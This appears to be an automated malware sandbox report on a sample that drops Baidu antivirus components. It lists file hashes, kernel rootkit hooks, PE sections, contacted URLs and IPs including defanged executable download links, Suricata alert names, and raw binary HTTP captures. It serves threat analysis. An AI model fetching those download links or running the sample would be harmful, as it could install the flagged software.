d9cce68f84f576bd244c91fb6df7d73d c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVEng.dll
bad438e36d73f20cb60e738fb9974198 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMBase.dll
89d798adf093aebaf041fd0197ede893 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMDownload.dll
34615a5c3ad5b59208d57674cb0f26fe c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMFrameWork.dll
dce4321312ff1fc63323d6b6a9f06522 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMLog.dll
c1ae08fe4bb466d651fdc4d3a943bdeb c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMMsg.dll
d4c2ce04bad7eb4d408118021e85dddb c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMNet.dll
cdb1722edcaf6a211344d80e30f2c295 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMPatchAgent.dll
06792f4af5c6d9b02be39ada55d2fbd7 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMReport.dll
ed5776988c1f89b6b3b24a3e174f1218 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMStringUtils.dll
605fcf4a03fe970725008fdaab511818 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMTinyXml.dll
6946e725d396a13c44529adbe63c4ecc c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMUpdate.dll
d280f73128561a62e8709fd81faa6097 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BDPerflog.dll
0177e3ded91fa30a3514e642c215d277 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHips.exe
af88ec6399f527720b342482e1a03cb8 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsBugRpt.exe
92c3bc063c1fc4acf176b8e7364c96d7 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsIU.dll
734b342d7091f44c1deeeb8be3313a8c c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsUpdate.exe
9474fcb760cd07111a05a0159138b9d2 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\DriverManager.dll
ec1059187b4cd5cf1f3d743a8b2693ff c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\TrustAndIso.dll
ae6b6a43cead19395446ee132b787249 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0001.dll
1fc801576f8b397276245edf7039b427 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0002.dll
94e2246531b2e5c3319da7ab79372d2f c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0001.sys
d1895f7555fff550e20bbf92146e17cf c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0002.sys
04116475cff6d3305a8233c8342ffa88 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0001.sys
c39fa78d836fcc2c62d16bac891394f8 c:\Program Files\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0002.sys
c1813f32fc06301e61efbe211a9ba0b8 c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkv\BDKVVirusPlugins.dll
d23f519d7040466c22c445ba8dc070cf c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\FileMon.dll
2d0bc8fe5f19a79f57b68fc9f61b9581 c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\HIPSClient.dll
15844bec40eefc0f55dbfcb2b44cfb63 c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\PrivacyProtect.dll
23af09ab60487fb5a8a2eb18c36d77ad c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll
9d7de59974d1acb3962ab3ed13b07fd0 c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll
d05545121c7f40e0c638fc720e28d90d c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll
4467b02c43945f67a4f98e9b9da41dd0 c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\UserDetectionPlugin.dll
ea98336db5a7c2da6b313c807e53b07f c:\Program Files\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\baidusdRepair.dll
7dfcbea77e16c3a4b74935b87b129d4e c:\Program Files\baidu\BaiduSd\2.1.0.3086\uninst.exe
485de987ac7faa82da2134263249eff0 c:\Program Files\baidu\BaiduSd\2.1.0.3086\updlog.dll
ac2583ae7c8e129febe9fb92b814a663 c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\DllInject.dll
ae9050fccdf1f8cb3755ead6bf6f254a c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\WebMonBHO.dll
16df69d9edd8b09a6f5be1c8dee939f7 c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\WebMonHook.dll
47794c331f77bbf0e3087938c7a77d23 c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\WebSafe.dll
621bdedf43439f422be371e971bd802a c:\Program Files\baidu\BaiduSd\2.1.0.3086\websafe\WebSafePlugin.dll
7f67d6cf6dd6ac289fc2255ff02b0833 c:\Program Files\baidu\BindEx.exe
ac12c71ef1d4b33819b85c158790d8d1 c:\Program Files\baidu\unins000.exe
3e9a33113d663d8bd5ed38858e669652 c:\WINDOWS\WinSxS\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\ATL80.dll
75f2a9b695ef3ef22d731f059920f636 c:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcm80.dll
8c53ccd787c381cd535d8dcca12584d8 c:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcp80.dll
1169436ee42f860c7db37a4692b38f0e c:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcr80.dll
34e11d25672bdf576c0bf780ee757ec5 c:\WINDOWS\system32\drivers\BDArKit.sys
b6edb1e0321c5f2f75352832ce21b507 c:\WINDOWS\system32\drivers\BDMWrench.sys
04116475cff6d3305a8233c8342ffa88 c:\WINDOWS\system32\drivers\bd0001.sys
c39fa78d836fcc2c62d16bac891394f8 c:\WINDOWS\system32\drivers\bd0002.sys
233c96e5369ef4b58ab606c2b150b65a c:\WINDOWS\system32\drivers\bd0003.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "%System%\DRIVERS\bd0001.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
The Trojan installs the following kernel-mode hooks:

ZwUnloadKey

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 152808 153088 4.64164 22ced87f8cfbeec19f10ea768b9f5033
.rdata 159744 20275 20480 3.68225 9aea8072fe8459f1fb075382c5799ef0
.data 180224 136672 5120 1.76573 5aafebbc10957e661762e0e7fadc057b
.rsrc 319488 352972 353280 2.60045 ebe1342043d9699ab4effe84ccb7c5c0

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://ru.cpabaidu.com/baidu/test.txt 185.8.106.167
hxxp://ru.cpabaidu.com/baidu/F1023_s_30803.exe 185.8.106.167
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab
hxxp://e6845.ce.akamaiedge.net/pca3.crl
hxxp://e6845.ce.akamaiedge.net/pca3-g5.crl
hxxp://e6845.ce.akamaiedge.net/CSC3-2010.crl
hxxp://swsd.n.shifen.com/
hxxp://ru.cpabaidu.com/baidu/G1023_s_70904.exe 185.8.106.167
hxxp://sxsw.n.shifen.com/
hxxp://baidubrs.dlmix.glb0.lxdns.com/client1/common/patch/24946961047/dnw.xml
hxxp://baidubrs.dlmix.glb0.lxdns.com/client1/common/patch/34282863525/BDMWrench.sys
hxxp://baidubrs.dlmix.glb0.lxdns.com/client1/common/patch/32175066779/putips_wording.dat
hxxp://baidubrs.dlmix.glb0.lxdns.com/client1/common/patch/33137149111/hipsClient.xml
hxxp://s.x.baidu.com/ 180.76.2.46
hxxp://d.x.baidu.com/ 123.125.115.130
hxxp://dl1sw.baidu.com/client1/common/patch/24946961047/dnw.xml 8.37.235.11
hxxp://csc3-2010-crl.verisign.com/CSC3-2010.crl 23.9.117.163
hxxp://crl.verisign.com/pca3.crl 23.9.117.163
hxxp://dl1sw.baidu.com/client1/common/patch/33137149111/hipsClient.xml 8.37.235.11
hxxp://dl1sw.baidu.com/client1/common/patch/32175066779/putips_wording.dat 8.37.235.11
hxxp://dl1sw.baidu.com/client1/common/patch/34282863525/BDMWrench.sys 8.37.235.11
hxxp://crl.verisign.com/pca3-g5.crl 23.9.117.163
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab 23.15.4.9
hxxp://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt 23.15.4.9
jp.download.iyuntian.com 123.125.65.154
tk.download.iyuntian.com 123.125.69.209
rc.download.iyuntian.com 123.125.65.153
up.download.iyuntian.com 123.125.65.148
res.download.iyuntian.com 123.125.65.129
dtrp.download.iyuntian.com 123.125.65.150
utk.download.iyuntian.com 123.125.65.147
cfg.download.iyuntian.com 123.125.65.132


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack

Traffic

GET /client1/common/patch/33137149111/hipsClient.xml HTTP/1.1
Accept: */*
Accept-Language: zh-CN,zh,en-US
Connection: Keep-Alive
Host: dl1sw.baidu.com
Referer: hXXp://dl1sw.baidu.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)


HTTP/1.0 200 OK
Expires: Sun, 09 Nov 2014 10:45:47 GMT
Date: Fri, 10 Oct 2014 10:45:47 GMT
Server: nginx
Content-Type: text/xml
Content-Length: 18710
Last-Modified: Fri, 10 Oct 2014 10:32:29 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
Age: 2316160
Via: 1.0 sxycwt26:8104 (Cdn Cache Server V2.0), 1.0 jg14:5706 (Cdn Cache Server V2.0)
Connection: close
Content-Disposition: attachment;filename="hipsClient.xml"
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD
.......k..65.Mf.?../..m.x..`.D..#........x$....x=.B...$j......y}.....R
.C[4x../../1........ .q..=../7L..R..if.%.....aa.....y.c.oO...T.K......
.>F..:. ..h. .>..l....vYe.X.u.C:...yQ.....6..Gr./....r. b.....W$
.8.R...7....1.......$.....PYf.E..!..p...0P.-..{..|!.j....G...K........
.......0.........%.b.a.2*.'...~.r..!*2..I...mv..b.-..z&....v...B.q.~h.
^r.....r..x.D(.3s.zI...G...........L.y.^.....|.D9[.W,....\..T.x.....[.
..C... ..$yKI.Q.LG..fG....".{...fP..S1...Mz).]Ln.....2v...d...seab..v.
......u...`*.....#...^@..G..Sb.dL5.8nhd.l.\.y...`.w.......3.u........A
....kq~.k....}-.| .......^...Z.})..Fq./.....U.)..:..8.j.q.*.e.#..-1..J
e...(....{..s.`se....Q.x......n..>......o4.>.3.xRO..X.~>..C`.
`.....f...o.h.),N.ad.#.-.......1.........(.S..[.....)..z....w.....G.#.
.(..=.]..p.E....Q....H...7........!....h?......_...1../X.....(.v......
h..o..b......p.QH..-..*..M.}...c.1h..}..k.ro6\...7..4.Za.....m........
>2.E...Q.....%A.b..:.....$..p.c.W....U.m...JL..f.i!.<..H.....n.)
../..2.?6.B.|j.IX'.bY.?1.........}...Cc....s].h........KY.... .....2.l
.#..........Vq. ........5...O;..A.Z..........7..:$..s..|...[.u...&O.kq
[email protected]...>0.....o#..>....c....Os.<!.a
.=.O......i.n.2GR-_prM..q..@.@.........>...Bl....&.5w..P.d9..N....S
...5..r....d@......(...-g,/..Z6...o}&}'.D......,...Cj..1..'...#j..[...
,..*[email protected]/[1....~..'^....h.......O^.?...m.......\
...[.?bZrl.I.X7E.......1E... .....&S.. .#.S&\g.0.49.....r.Z...~.0.K...
..R,.4.d.6cG...#9.......E..._.<.@.)V0.:.........B..B.Z.-".1o.T.
<<< skipped >>>


POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 158
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=..t..............guq."..=.[[email protected]...` ......VH>x.yw}Y.p~t....E..;.).
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 198
...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=
..t..............guq."..=.[[email protected]...` [email protected]`
...[....V.Y..!c...A...<.....T.....Gl~.].......W3..4A._[D....



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 166
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28..j:.
..i.t..A.c. 8.U......v.6.#.....A..G...d...*\.<.
[email protected]...` ... ..D)..-...uT.h
.).:va:Y......H...
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 182
...z........" b58974f666e28edaba3814768157053d(.........28..j:.....i.t
..A.c. 8.U......v.6..#.....A..G...d...*\.<[email protected]...` ...0...x.
...U..2....$.5...'....2]..U......g'..Y..9.^. HTTP/1.1 200 OK..Server: 
iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: timeo
ut=30..Connection: Keep-Alive..Content-Length: 182.....z........" b589
74f666e28edaba3814768157053d(.........28..j:.....i.t..A.c. 8.U......v.
6..#.....A..G...d...*\.<[email protected]...` ...0...x....U..2....$.5...'
....2]..U......g'..Y..9.^. ..



GET /pca3.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "8f6b3bcd9bb64555001fba64f5b01b92:1411517716"
Last-Modified: Wed, 24 Sep 2014 00:15:16 GMT
Date: Thu, 06 Nov 2014 06:07:34 GMT
Content-Length: 933
Connection: keep-alive
Content-Type: application/pkix-crl
0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U
....Class 3 Public Primary Certification Authority..140922000000Z..141
231235959Z0..x0!...v....a_>..2......020924164823Z0!.....A.....{2..Y
.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y..q.....
..fh...020923171400Z0!...?A....a.nF`.P....020923171548Z0!............R
.e.53..010207212458Z0!..!......Y...ISi....010706171411Z0!..$-..I{r....
u<._...080403172226Z0!..&.."?..y..51}..1..010706172118Z0!..4....2..
..{W......080605175030Z0!..B....c............070411175910Z0!..H.Py...N
....* [email protected]!..Y......w
`G........070411175657Z0!..Z`[email protected].*q..080403172017Z0!..l....I..
.Y..] .c..010706171749Z0"......T=deQ...1u.]...010207212247Z0".....p..1
..7<.....e..010207211822Z0...*.H............M....s#..Lo...TU...tM.3
...'.U......:Z...w.x.=....K.0;...!....D....9...,!....B.t. <........
..-.....k.$<i{O.<.E...*.......Ow _..J.....


GET /pca3-g5.crl HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Server: Apache
ETag: "bd6753109994fa1bef1833b34f3e263b:1411514416"
Last-Modified: Tue, 23 Sep 2014 23:20:16 GMT
Date: Thu, 06 Nov 2014 06:07:34 GMT
Content-Length: 533
Connection: keep-alive
Content-Type: application/pkix-crl
0...0..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U
....VeriSign Trust Network1:08..U...1(c) 2006 VeriSign, Inc. - For aut
horized use only1E0C..U...<VeriSign Class 3 Public Primary Certific
ation Authority - G5..140922000000Z..141231235959Z0...*.H.............
O...i.i(.#..s.T....F....${|...xLT.k...(....AC.#.....Y.Ht..}.n..* ...b.
Gs...G..N.|2*.9l....\..H.Y....Wh. .....A.......?/...}.......z.Q..qP_.-
..~......!.UBW...ER..6....:.p...[...../..h...9.J(..<.;i.......?c.I.
t....LV.uD....B..z...~I .6..aR[..(..q............HTTP/1.1 200 OK..Serv
er: Apache..ETag: "bd6753109994fa1bef1833b34f3e263b:1411514416"..Last-
Modified: Tue, 23 Sep 2014 23:20:16 GMT..Date: Thu, 06 Nov 2014 06:07:
34 GMT..Content-Length: 533..Connection: keep-alive..Content-Type: app
lication/pkix-crl..0...0..0...*.H........0..1.0...U....US1.0...U....Ve
riSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 VeriS
ign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 Publ
ic Primary Certification Authority - G5..140922000000Z..141231235959Z0
...*.H.............O...i.i(.#..s.T....F....${|...xLT.k...(....AC.#....
.Y.Ht..}.n..* ...b.Gs...G..N.|2*.9l....\..H.Y....Wh. .....A.......?/..
.}.......z.Q..qP_.-..~......!.UBW...ER..6....:.p...[...../..h...9.J(..
<.;i.......?c.I.t....LV.uD....B..z...~I .6..aR[..(..q..............
<<< skipped >>>


POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 166
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28|PcJ.2.H.0.v[.o.'...aG.s.2....@....%.F..M.[email protected]...` ... ..D)..-....9
._e..BBw......ar.m...
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 2486
...z........" b58974f666e28edaba3814768157053d(.........28|PcJ.2.H.0.v
[.o.'...aG.s.2....@....%[email protected]...` ...0..{.....
[email protected]`..._..(.H.....R.........<..z<./M........~..J..I..
..R....h. Fk.....R...~!L:...s.>.V@ 9 ..N.0...m...xH.E..............
...)T5..t&FF..5....oM......}}.;.$1.n.......).^..(.E.p...........s.e...
p .Kq.!..E....C.' D.3'/_...;.'o{......<.*.I....}q..@Pn..;.(m7......
[email protected]>.....R6.\..(.u..`....../,7.* ...Z......q..!...*C.O
........L..b"......f.2.....a.y...\..1..ecG...X..^.........2SB...6...."
...NA...T.K\....v....n0.....[.(.-.w....&!x.a-../[email protected]"w..J..e....P.
..M......4.X......n9..N]#..uL...Y..}.......y........#....cn...0..p\ .I
4..v.....s......h.;..*g......."..OQpC....&....&...... X....PkzS.@.....
G.J...$...sU[q.`..]..p..bkB..S..S)...... .ez.h.7.&.E......=.l/.^...>
;X..f..~.Y.qr........kq...y[_.Q...6.5...qcn......c.....}.NS)....2'....
\#..5......6..`n..%_".......o.-1..Z.4../V.0...E<.@...].J..M1...H..*
|.....CW;.9E]..|h...n...#.....E.y.,.x....Ot..*...S#..-.C..0......q4..f
........W.2...<..2.#8.....*^=......c.....9,).D..?.t.bl.'.V..l..V...
cg%w..e......K........P...&...n..Bn|..q..F......7t..q...lq.... ?.NmS..
.{.\f...X......&..4.G..2...>....ux0W....[f .N..#...k&..o.]M./......
.,....a.v..I.......zG.>a|..F.M..e..1.......i.....j..............i..
f.HBx...l.EL.,\.W....._...Gw.........t.*1{!........;..z......o........
?G.-{.q....h...mA...'K_d.yHA .....eY....-..[.....H..5_...%.#..........
.&..'...z...>d.{.<}. ~..-6f%:.....90x.....U......3.O....|..[
<<< skipped >>>


POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 166
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ... ..f#.g..})..U\.........).)3.T..4.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 302
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ............
".k.<(h[.Vwk.R.....i..g{.! .".U-h.0....s..$..f...:.w........1JE.?.n
..........N..m...q...{. ..2..FWe...........}.5.Lc...8.....3bl.]..P....
....Dil4.. ../..P.[....%.HTTP/1.1 200 OK..Server: iYuntianSvr..Content
-Type: application/octet-stream..Keep-Alive: timeout=30..Connection: K
eep-Alive..Content-Length: 302.....z........" b58974f666e28edaba381476
8157053d(.........28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...
p..6|[email protected]...` ............".k.<(h[.Vwk.R.....i..g{.! .".U-h.0
....s..$..f...:.w........1JE.?.n..........N..m...q...{. ..2..FWe......
.....}.5.Lc...8.....3bl.]..P........Dil4.. ../..P.[....%...



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 78
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...B........" b58974f666e28edaba3814768157053d([email protected]...` ......
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 134
...z........" b58974f666e28edaba3814768157053d(.........28..j:.....i.t
..A.c. 8.U......v.6..#.....A..G...d...*\.<[email protected]...` ........



GET /msdownload/update/v3/static/trustedr/en/authrootseq.txt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 12 Sep 2014 18:02:51 GMT
Accept-Ranges: bytes
ETag: "80179bc4b3cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 18
Cache-Control: max-age=3635
Date: Thu, 06 Nov 2014 06:07:33 GMT
Connection: keep-alive
X-CCC: CA
X-CID: 2
1401CFCEB3C4C42958....


GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1


Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: VVV.download.windowsupdate.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 12 Sep 2014 18:47:05 GMT
Accept-Ranges: bytes
ETag: "805a83f2b9cecf1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 56928
Cache-Control: max-age=7567
Date: Thu, 06 Nov 2014 06:07:33 GMT
Connection: keep-alive
X-CCC: CA
X-CID: 2
MSCF....`.......,...................I.................,E.Y .authroot.s
tl..Y-..8..CK...<T...g.v!M.d..f.%d..}K..5..F. ...T..%.,YJ.,!T......
_..x.<=O.....yy....;3..>.|..~..\.....|......;..8..~.za...."A...q
.......g..m......<X........j"I........!..-w.....w....P...H..(.?}..2
.N. .u..a. ...=.C..D.F>rC.. ..|).=.. ..3b.8H.M...(...u8.%...W.g...\
YB.m:.....dE.........V....$....Dn:....0...S."...o..q.....K...I..K...(x
%....>A.R...`.0 .........<`L0mp...%....y.....g.n...R0Op..<..,
....`0$z.@..&.x"....T..H...<........~..E..".....<<.\B(.......
[email protected]/"...f.......k..Jm7j....R.5q....Rz.
.!@...].......Y.[........4.. .D8..&...t.J^O..Q.._..1.J.m5<'k.,....%
T....i.\.;.;q..S./ 8.?Bu.............}D.Q....L....*..[.."e......15m...
_.0.M........#..v!..<...@..?sc.y....*.....tX[........{.W4.Q...^u@..
*..QP.......~.L9N....2r...4.....B..-\(...b.d...K...O.8..Un.......V.<
;.......A...V.....(..s..f..q.{N0.hS.,..;M.|G|[email protected].._.....7._6...C.0...
A;L....%...M=Y.....f.JV.(.5.....0..?*...KZ....jM...8.6U...#...ew.?..?.
..........WE.Or..O>..{.'[email protected]}.o:?~....]&l
t;!...%....}@.d...L.p.a.g ..K."..N1!%..S.bT.H.-.....e..`.0$...0t..DX..
{.....#./...8.5..M...T.......D......V\C.zy.....3E:..>.{..).QW......
q....9..n..1....8%,.........r.p@.>. ...Q.?.p..7.?..7...&..!........
.`. .=....Sf..q.l.A.....L...t.}g..;...f....=.e.~.z....C..*R....H-..=..
.f..(t'.."....F...g._....n.J..U.4vr`}.....1..o@.....@.#...R. L8....z..
].|......3..y..-./....K..6{...s.<R`.}[email protected]....
<<< skipped >>>


POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 166
Content-Type: application/octet-stream
Host: s.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d(.........28e..kYN........;..nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ... ...f...f.i#O.ron...7?..";...>..;..
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 286
...z........" b58974f666e28edaba3814768157053d(.........28e..kYN......
..;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]...` ...... %@...
...).u....Z.(L]~........]......L..w... ......BTl.Tf..<...X.wg..r.i.
>..Y.8...1J.A..1..TP=S$./.=k..9...c..~5.)...;.........6..z._.0.GV..
[.X..f...|.*HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: applic
ation/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Co
ntent-Length: 286.....z........" b58974f666e28edaba3814768157053d(....
.....28e..kYN........;...nA.0.7Dr.....:PfR...G{...I-.T...p..6|[email protected]
.X...` ...... %@......).u....Z.(L]~........]......L..w... ......BTl.Tf
..<...X.wg..r.i.>..Y.8...1J.A..1..TP=S$./.=k..9...c..~5.)...;...
......6..z._.0.GV..[.X..f...|.*..



POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 182
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=..t..............guq."..=.[[email protected]...` ...0.L;P.....~.=....oX.....X5H..5.C^...v...TPJ...Jv..POST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 190
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=..t..............guq."..=.[[email protected]...` ...8.L.4.CZ?.i/Q)....|.....f....K...C....l/K..?.a...JCzY.U.&.IPOST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 174
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=..t..............guq."..=.[[email protected]...` ...(..Q.b.g.[a.a.9.........y6..%.d..O.V..?..?qPOST / HTTP/1.1
Connection: Keep-Alive
Content-Length: 174
Content-Type: application/octet-stream
Host: d.x.baidu.com
Keep-Alive: timeout=600,max=1000

...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=..t..............guq."..=.[[email protected]...` ...(....S...R.H..H...&...!....8.?.T.b.../\. W.
HTTP/1.1 200 OK
Server: iYuntianSvr
Content-Type: application/octet-stream
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Length: 150
...z........" b58974f666e28edaba3814768157053d([email protected].(.0..=
..t..............guq."..=.[[email protected]...` .....Ln..o".
<a...K..:.HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: appli
cation/octet-stream..Keep-Alive: timeout=30..Connection: Keep-Alive..C
ontent-Length: 150.....z........" b58974f666e28edaba3814768157053d(...
[email protected].(.0..=..t..............guq."..=.[[email protected].
P.X...` .....Ln..o".<a...K..:.HTTP/1.1 200 OK..Server: iYuntianSvr.
.Content-Type: application/octet-stream..Keep-Alive: timeout=30..Conne
ction: Keep-Alive..Content-Length: 150.....z........" b58974f666e28eda
ba3814768157053d([email protected].(.0..=..t..............guq."..=.[Q7.
[email protected]...` .......;D...J.X..~....HTTP/1.1 200 OK..Ser
ver: iYuntianSvr..Content-Type: application/octet-stream..Keep-Alive: 
timeout=30..Connection: Keep-Alive..Content-Length: 150.....z........"
 b58974f666e28edaba3814768157053d([email protected].(.0..=..t..........
....guq."..=.[[email protected]...` .....L....u..)M-0....@HTT
P/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-str
eam..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length: 1
50.....z........" b58974f666e28edaba3814768157053d([email protected].(.
